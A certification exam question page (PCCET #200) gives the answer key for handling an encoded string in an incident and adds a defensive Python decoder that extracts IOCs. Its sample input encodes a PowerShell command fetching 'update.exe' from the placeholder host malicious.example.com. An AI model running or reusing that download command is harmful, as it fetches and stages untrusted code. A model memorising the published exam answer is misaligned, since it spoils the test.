PCCET Question #200: Real Exam Question with Answer & Explanation
The correct answer is D: Decode the string and continue the investigation.
Question
What should a security operations engineer do if they are presented with an encoded string during an incident investigation?
Options
- A. Save it to a new file and run it in a sandbox.
- B. Run it against VirusTotal.
- C. Append it to the investigation notes but do not alter it.
- D. Decode the string and continue the investigation.
Explanation
An encoded string is a common technique used by attackers to obfuscate their malicious code or data. By decoding the string, a security operations engineer can reveal the true nature and intent of the attacker, and potentially discover indicators of compromise (IOCs) such as IP addresses, domain names, file names, etc. Decoding the string can also help the engineer to determine the type and severity of the incident, and the appropriate response actions. Therefore, decoding the string and continuing the investigation is the best option among the given choices. Saving the string to a new file and running it in a sandbox may be risky, as it could execute the malicious code and cause further damage. Running the string against VirusTotal may not yield any useful results, as the string may not be recognized by any antivirus engines. Appending the string to the investigation notes but not altering it may not provide any additional insight into the incident, and may delay the response process.
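The decoding step that option D describes, as an added example that is not part of the PCCET question or its explanation: peel common encoding layers (hex, base64, and the UTF-16LE text that PowerShell's `-EncodedCommand` uses) off a string with Python's standard library, then pull IOCs (URLs, IP addresses, domain names) out of the readable result. Nothing decoded is ever executed. The sample string is constructed here for the demonstration; `malicious.example.com` and `192.0.2.10` are documentation placeholders, and the function names are this example's own.

```python
"""Added example (not from the PCCET page): peel encoding layers off a string
found during an investigation and extract IOCs from the decoded text, without
ever executing it."""
import base64
import binascii
import re

# Simple IOC patterns; the TLD list is deliberately short and is an assumption
# of this example, not an exhaustive rule.
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|ru|xyz|info|top)\b", re.I)


def _try_hex(s):
    """Return raw bytes if s is an even-length hex string, else None."""
    t = s.strip()
    if not t or len(t) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", t):
        return None
    return bytes.fromhex(t)


def _try_base64(s):
    """Return raw bytes if s is strict, correctly padded base64, else None."""
    t = "".join(s.split())
    if not t or len(t) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", t):
        return None
    try:
        return base64.b64decode(t, validate=True)
    except (binascii.Error, ValueError):
        return None


def _to_text(b):
    """Decode bytes as UTF-16LE when every odd byte is NUL (PowerShell style),
    otherwise as UTF-8; None if neither works."""
    if len(b) >= 4 and len(b) % 2 == 0 and all(x == 0 for x in b[1::2]):
        try:
            return b.decode("utf-16-le")
        except UnicodeDecodeError:
            return None
    try:
        return b.decode("utf-8")
    except UnicodeDecodeError:
        return None


def _looks_like_text(t):
    """Accept a decoding only if at least 95% of it is printable text."""
    if not t:
        return False
    ok = sum(1 for ch in t if ch.isprintable() or ch in "\r\n\t")
    return ok / len(t) >= 0.95


def decode_layers(s, max_depth=5):
    """Repeatedly strip hex/base64 layers while each step yields readable text.

    Returns (layers, text): the encodings peeled in order, and the final text.
    A string that is not encoded comes back unchanged with an empty layer list.
    """
    layers, cur = [], s
    for _ in range(max_depth):
        for name, fn in (("hex", _try_hex), ("base64", _try_base64)):
            raw = fn(cur)
            if raw is None:
                continue
            text = _to_text(raw)
            if text is not None and _looks_like_text(text):
                layers.append(name)
                cur = text
                break
        else:
            break  # no decoder produced readable text: stop peeling
    return layers, cur


def extract_iocs(text):
    """Collect de-duplicated URLs, IPs and domains from decoded text."""
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "ips": sorted(set(IP_RE.findall(text))),
        "domains": sorted(set(d.lower() for d in DOMAIN_RE.findall(text))),
    }


# Constructed sample: a PowerShell-style command, UTF-16LE + base64 encoded,
# then wrapped once more in hex to show multi-layer peeling.
SAMPLE_PLAINTEXT = ("Invoke-WebRequest http://malicious.example.com/update.exe "
                    "-OutFile $env:TEMP\\u.exe; Test-Connection 192.0.2.10")
SAMPLE_B64 = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16-le")).decode()
SAMPLE_HEX_B64 = SAMPLE_B64.encode().hex()

if __name__ == "__main__":
    layers, text = decode_layers(SAMPLE_HEX_B64)
    print("layers peeled:", layers)
    print("decoded text :", text)
    print("IOCs         :", extract_iocs(text))
```

Each layer is only accepted if it decodes to mostly printable text, so a hex string that happens to be valid base64 (or the reverse) is not mis-decoded into binary noise, and the loop stops as soon as no decoder yields readable output. The extracted URLs, IPs and domains are what the explanation above calls IOCs, ready to be pivoted on in logs or threat intelligence rather than run in a sandbox.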